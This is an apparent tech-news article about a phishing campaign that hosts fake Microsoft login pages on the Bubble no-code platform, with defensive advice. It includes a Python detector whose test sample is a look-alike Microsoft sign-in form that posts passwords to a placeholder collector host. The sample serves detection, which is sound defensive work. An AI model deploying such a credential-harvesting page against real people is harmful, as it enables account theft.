Cybersecurity Ecosystem

Phishing Campaign Exploits No-Code AI Platform to Steal Microsoft Account Credentials

⚡ Quick Summary

  • Phishing campaign uses Bubble no-code AI platform to create fake Microsoft login pages
  • Attacks bypass security filters by hosting on legitimate high-reputation domains
  • AI tools have lowered the barrier for creating sophisticated phishing infrastructure
  • Organisations urged to deploy phishing-resistant MFA like passkeys and FIDO2 keys

What Happened

Security researchers have uncovered a sophisticated phishing campaign that weaponises Bubble, a popular no-code application builder powered by AI, to create convincing credential-harvesting pages targeting Microsoft account holders. The threat actors are generating malicious web applications through Bubble's drag-and-drop interface, then hosting them on the platform's legitimate infrastructure to evade traditional security filters.

The attack chain works by sending victims emails that appear to originate from trusted sources, directing them to Bubble-hosted pages that mirror Microsoft's login interface with near-pixel-perfect accuracy. Because the phishing pages sit on Bubble's own domains — which carry strong reputation scores and valid SSL certificates — they slip past email gateways, URL scanners, and browser-based phishing protection that rely on domain reputation as a primary signal.

BleepingComputer, which first reported the campaign, confirmed that multiple enterprise organisations have been affected. The stolen credentials are being used for business email compromise, lateral movement within corporate Microsoft 365 tenants, and in some cases, ransomware deployment. Microsoft's own threat intelligence team has acknowledged the vector and is working with Bubble to implement countermeasures.

Background and Context

No-code and low-code platforms have exploded in popularity over the past three years, with Bubble alone reporting more than four million applications built on its infrastructure. These platforms democratise software development, letting anyone spin up functional web applications without writing a single line of code. That same accessibility, however, has created a new class of attack surface.

This is not the first time legitimate SaaS infrastructure has been abused for phishing. Attackers have previously leveraged Google Sites, Microsoft Azure Blob Storage, and Cloudflare Pages to host credential-harvesting pages. The common thread is trust inheritance: security tools are reluctant to block domains belonging to major platforms because doing so would cause massive false-positive disruption.

The AI component adds a new dimension. Bubble's AI assistant can generate form layouts, authentication flows, and styled pages in minutes, dramatically reducing the technical barrier for creating convincing phishing infrastructure. What once required HTML knowledge and manual hosting can now be accomplished through natural-language prompts, making the attack accessible to a far wider pool of threat actors.

For businesses running on Microsoft 365 — which includes the vast majority of enterprises — this represents a direct threat to their identity perimeter. Anyone using an affordable Microsoft Office licence or corporate 365 subscription should take immediate note of the attack vector and review their phishing defence posture.

Why This Matters

This campaign exposes a fundamental weakness in the security industry's reliance on domain reputation as a trust signal. When phishing pages live on domains belonging to legitimate, well-known platforms, the traditional blocklist approach fails completely. Security vendors will need to evolve toward content-based analysis — examining what a page actually does rather than where it lives.
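As an added illustration of the content-based approach described above (example code written for this article, not tooling from BleepingComputer, Bubble or Microsoft), the following scanner ignores where a page lives and looks at what it does: it parses the HTML, finds forms that collect a password, checks for Microsoft sign-in branding in the visible text, and flags the page when that combination is served from a host outside an allowlist of Microsoft login hosts, or when the form posts credentials to a third-party host. The allowlist, the brand markers and the two HTML pages are constructed assumptions for the example; a production gateway would pair this kind of check with full page rendering, since AI-built pages can inject the form with JavaScript.

```python
"""Content-based check for pages that imitate the Microsoft sign-in form.

Added example for this article, not vendor code. The host allowlist, brand
markers and sample pages below are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts a defender accepts as legitimately serving a Microsoft
# account sign-in form. Extend with federated IdPs your tenant trusts.
MICROSOFT_LOGIN_HOSTS = {
    "login.microsoftonline.com",
    "login.live.com",
    "login.microsoft.com",
}

# Assumption: strings whose presence suggests the page is dressed as a
# Microsoft sign-in page (all lower-case; page text is lower-cased before matching).
BRAND_MARKERS = ("microsoft", "office 365", "outlook", "sign in to your account")


class FormScanner(HTMLParser):
    """Collect every <form> that contains a password input, plus visible text."""

    def __init__(self):
        super().__init__()
        self.forms = []        # one dict per form: {"action": str, "has_password": bool}
        self._current = None   # form currently being parsed
        self.text = []         # text nodes, joined later for brand matching

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

    def handle_data(self, data):
        self.text.append(data)


def assess_page(page_url, html):
    """Return a verdict based on page content, not on the host's reputation."""
    scanner = FormScanner()
    scanner.feed(html)
    host = (urlparse(page_url).hostname or "").lower()
    text = " ".join(scanner.text).lower()
    brand = [m for m in BRAND_MARKERS if m in text]
    cred_forms = [f for f in scanner.forms if f["has_password"]]
    findings = []

    # Signal 1: Microsoft-branded password form on a host that is not Microsoft's.
    if cred_forms and brand and host not in MICROSOFT_LOGIN_HOSTS:
        findings.append(f"microsoft-branded password form served from non-microsoft host {host}")

    # Signal 2: the form ships the credentials to a different, untrusted host.
    for f in cred_forms:
        action_host = (urlparse(f["action"]).hostname or "").lower()
        if action_host and action_host != host and action_host not in MICROSOFT_LOGIN_HOSTS:
            findings.append(f"credentials posted to third-party host {action_host}")

    return {
        "host": host,
        "credential_forms": len(cred_forms),
        "brand_markers": brand,
        "findings": findings,
        "suspicious": bool(findings),
    }


# Constructed sample: a look-alike sign-in page on a non-Microsoft host that
# posts the form to a separate collector host. Both hostnames are placeholders.
PHISH_URL = "https://signin-portal.example.net/login"
PHISH_HTML = """<html><head><title>Sign in to your account</title></head>
<body><h1>Microsoft</h1>
<form method="post" action="https://collector.example.org/post">
<input type="email" name="loginfmt">
<input type="password" name="passwd">
<button>Sign in</button></form></body></html>"""

# Constructed sample: the same form shape on the real Microsoft login host,
# posting to a relative path (same origin), which the check should accept.
LEGIT_URL = "https://login.microsoftonline.com/common/oauth2/authorize"
LEGIT_HTML = """<html><head><title>Sign in to your account</title></head>
<body><h1>Microsoft</h1>
<form method="post" action="/common/login">
<input type="email" name="loginfmt">
<input type="password" name="passwd">
<button>Sign in</button></form></body></html>"""


if __name__ == "__main__":
    for url, page in ((PHISH_URL, PHISH_HTML), (LEGIT_URL, LEGIT_HTML)):
        print(url, assess_page(url, page))
```

The two signals are independent: a page on a trusted platform domain trips the first one, and a page that posts credentials off-origin trips the second even if the host itself is whitelisted. Legitimate third-party identity providers that present a Microsoft-branded form will also be flagged by the first signal, so the allowlist has to be tuned per tenant rather than treated as fixed.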

The democratisation of attack tooling through AI-powered no-code platforms represents a structural shift in the threat landscape. The barrier to entry for creating sophisticated phishing campaigns has dropped from "needs to understand HTML, CSS, and web hosting" to "can type a description of what they want." This compression of the skill requirement means the volume of phishing attacks is likely to increase significantly, even as individual campaigns become harder to detect.

For Microsoft account holders specifically, the risk is amplified by the centralised nature of Microsoft's identity system. A compromised Microsoft account doesn't just give attackers access to email — it potentially unlocks OneDrive, SharePoint, Teams, and every connected enterprise application. The blast radius of a single stolen credential in the Microsoft ecosystem is enormous.

Industry Impact

The security industry is being forced to reckon with the dual-use nature of every productivity tool. No-code platforms, AI assistants, and cloud hosting services are all force multipliers — they amplify capability regardless of intent. Platform providers like Bubble now face the difficult challenge of enabling legitimate users while preventing abuse, without introducing friction that undermines their core value proposition.

Email security vendors are already scrambling to adapt. Companies like Proofpoint, Mimecast, and Abnormal Security will need to deploy more sophisticated page-rendering and behavioural analysis to catch these attacks. Static URL scanning is no longer sufficient when the hosting infrastructure is inherently trusted.

Microsoft itself faces pressure to strengthen its authentication defences. The company has been pushing passkeys and phishing-resistant MFA through its Entra ID platform, but adoption remains uneven across its massive customer base. This campaign will likely accelerate enterprise migration to hardware-backed authentication methods.

For organisations that depend on enterprise productivity software built on Microsoft's ecosystem, the message is clear: identity protection must be treated as a first-class security priority, not an afterthought bolted onto existing infrastructure.

Expert Perspective

The convergence of AI-powered development tools and phishing is a predictable evolution that the security community has been warning about for over a year. What makes this particular campaign noteworthy is not its sophistication in isolation, but the scalability it demonstrates. A single threat actor can now generate dozens of unique, convincing phishing pages per day using natural-language prompts.

The defensive response needs to be equally scalable. Organisations should implement conditional access policies that restrict authentication to managed devices and known network locations. FIDO2 security keys and passkeys should be mandated for privileged accounts at minimum, with a roadmap to extend phishing-resistant MFA to all users.

What This Means for Businesses

Small and mid-size businesses are disproportionately vulnerable to this type of attack. They often lack dedicated security teams, rely heavily on Microsoft 365 for daily operations, and may not have deployed advanced email security beyond Microsoft's built-in protection. The cost of a compromised Microsoft tenant — including business email compromise fraud, data exfiltration, and operational disruption — can be devastating.

Immediate actions include enabling number-matching MFA in Microsoft Authenticator, deploying conditional access policies to block legacy authentication protocols, and conducting targeted phishing awareness training that specifically addresses attacks hosted on trusted platforms. Businesses should also ensure they're running legitimate, properly licensed software — using a genuine Windows 11 key and keeping systems updated is a baseline defence against post-compromise exploitation.

Looking Ahead

Expect no-code platform abuse to become a persistent feature of the phishing landscape. Platform providers will implement content scanning and abuse detection, but the cat-and-mouse dynamic will continue as attackers find new ways to evade automated checks. The security industry's shift toward content-based and behavioural analysis — examining what pages do rather than where they live — will accelerate. For enterprises, the transition to phishing-resistant authentication is no longer optional; it's an operational necessity.

Frequently Asked Questions

How does this phishing attack work?

Threat actors use Bubble's AI-powered no-code platform to create convincing Microsoft login pages hosted on Bubble's legitimate domains, which bypass security filters that rely on domain reputation.

How can businesses protect against this type of phishing?

Enable number-matching MFA, deploy FIDO2 security keys or passkeys for privileged accounts, implement conditional access policies, and train staff to recognise phishing on trusted platforms.

Why are no-code platforms being targeted by attackers?

No-code platforms provide legitimate hosting infrastructure with strong domain reputation, valid SSL certificates, and AI-assisted page creation — making it easy to build convincing phishing pages that evade detection.

OfficeandWin Tech Desk
Covering enterprise software, AI, cybersecurity, and productivity technology. Independent analysis for IT professionals and technology enthusiasts.